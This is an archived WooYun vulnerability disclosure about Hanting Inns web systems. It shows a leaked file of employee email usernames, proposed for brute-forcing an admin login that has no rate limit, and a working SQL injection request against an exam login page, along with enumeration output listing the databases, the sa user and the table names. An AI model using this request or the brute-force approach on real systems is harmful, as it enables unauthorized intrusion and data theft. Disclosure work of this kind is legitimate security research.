乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-03-14: 细节已通知厂商并且等待厂商处理中 2014-03-15: 厂商已经确认,细节仅向厂商公开 2014-03-25: 细节向核心白帽子及相关领域专家公开 2014-04-04: 细节向普通白帽子公开 2014-04-14: 细节向实习白帽子公开 2014-04-28: 细节向公众公开
#1.信息泄漏:这里泄漏了大量的用户Email用户名,6MB的TXT文档,通过收集这些用户名可以进行后台的爆破,因为后台没有验证码与错误登录次数限制。
http://jcxt.htinns.com/mail.txt
以下列举个别:
l**[email protected]ts***@htinns.comt***[email protected]h***[email protected]xu***[email protected]w***[email protected]l***@htinns.comk***[email protected]y****@htinns.comb****@htinns.comh****@htinns.comh****@htinns.comx****[email protected]y****[email protected]d****[email protected]z**@htinns.comd****[email protected]t****@htinns.comc****[email protected]f****[email protected]l****[email protected]w****[email protected]y****[email protected]s****[email protected]c**@htinns.comz****[email protected]l****@htinns.comx**[email protected]x**[email protected]
#2.Post注入一枚:
POST /exam2/login.asp?win= HTTP/1.1Host: training.htinns.comProxy-Connection: keep-aliveContent-Length: 36Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://training.htinns.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: http://training.htinns.com/exam2/Accept-Encoding: gzip,deflate,sdchAccept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4Cookie: Hm_lvt_e5770a47472445b3f839a58a32b8abe5=1394799212; Hm_lpvt_e5770a47472445b3f839a58a32b8abe5=1394799385; ASPSESSIONIDCSAQQQQQ=APGAMJPALKBMAOBPDBGIMADM; id=admin%27; %2Fbbs%2FGROUP=1username=admin&password=admin&czbz=1
available databases [48]:[*] Application_Registry_Service_DB_5d9281593cab42dc8320efcf7cbfd7a0[*] Bdc_Service_DB_17fc7e4144144d30bf092d46962cf618[*] dbcenter[*] dnt31[*] eCell6[*] Exam1[*] HT_eProcurement[*] HTFranchisee[*] HtinnsAdviser[*] HTIntranetUAT[*] HTScore[*] InnInspection[*] InspectionAudit[*] Managed Metadata Service_eb3ad9498f3c4d538c1c638c92230972[*] master[*] model[*] msdb[*] OA[*] PerformancePoint Service Application_1e41da1b1ab64e55b59c496da2baa509[*] PnCheck[*] PurchaseSurvey[*] RCTIDB[*] ReportServer[*] ReportServerTempDB[*] ROOMCHK[*] Search_Service_Application_CrawlStoreDB_a4e0258f3e8d475dbc9ae62b373ce475[*] Search_Service_Application_DB_e90bd9a6f93d43c294e41402b5d631e9[*] Search_Service_Application_PropertyStoreDB_bda79800fee24b8691db0032d6ceccb[*] Secure_Store_Service_DB_b62005406e8a4f12a854cb5a434821f4[*] SharePoint_AdminContent_5947d722-6796-4bc7-ae44-1c894454c1f5[*] SharePoint_Config[*] slam[*] StateService_23c5611220344b52bea83c8d6fd7ddc8[*] tempdb[*] test[*] User Profile Service Application_ProfileDB_cb8f9f4b3ec14f0ea7f125fe176a4e0[*] User Profile Service Application_SocialDB_6bd18e2e80804b86bc5687f722d780ab[*] User Profile Service Application_SyncDB_c8c90e3cd266442f83f260c4b75ad735[*] USERPLUS[*] VHArchives_HanTing[*] WebAnalyticsService????_ReportingDB_7dc7dc51-0f26-49e6-8b74-9187ccdf0186[*] WebAnalyticsService????_StagingDB_458c6a10-f5c4-4756-a2d6-010eb6805b43[*] WordAutomationServices_04a084d97a3d4f83af4b3667b5385333[*] WSS_Content[*] WSS_Content_90[*] WSS_Content_b3117e51d8c8405888a80388555ec208[*] WSS_Logging[*] YunYing
database management system users [2]:[*] PowerExamUser[*] sa
Database: Exam1[41 tables]+--------------------+| dbo.BbsClass || dbo.BbsMain || dbo.Cjdxm || dbo.Denglu || dbo.Fenzu || dbo.Fenzu_Renyuan || dbo.Ftp_Cs || dbo.Ftp_Kc || dbo.Glyftpqx || dbo.ImgKu || dbo.Kaoshi_Detail || dbo.Kaoshi_Master || dbo.Kaoshi_daan || dbo.Kc_Main || dbo.Kc_Ren || dbo.Kc_lb || dbo.Ksj_Cl || dbo.Ksj_Cl_Temp || dbo.Ksj_Gd_Detail || dbo.Ksj_Main || dbo.Ksj_Ren || dbo.Mrfz || dbo.OperLog || dbo.Reninfoset || dbo.Renyuan || dbo.RenyuanInfo || dbo.ScoreView || dbo.Sjglqx || dbo.TZ || dbo.TiKu_Detail || dbo.Tiku_Main || dbo.Tkj || dbo.Tkjgl || dbo.Tmlb || dbo.Txfs || dbo.Txsx || dbo.Txxz || dbo.UserExamRecord || dbo.Userinfo || dbo.Zhsz || dbo.dtproperties |+--------------------+
危害等级:高
漏洞Rank:15
确认时间:2014-03-15 16:32
感谢关注!已转送相关团队进行跟进,谢谢!
2014-04-09:漏洞已关闭,谢谢!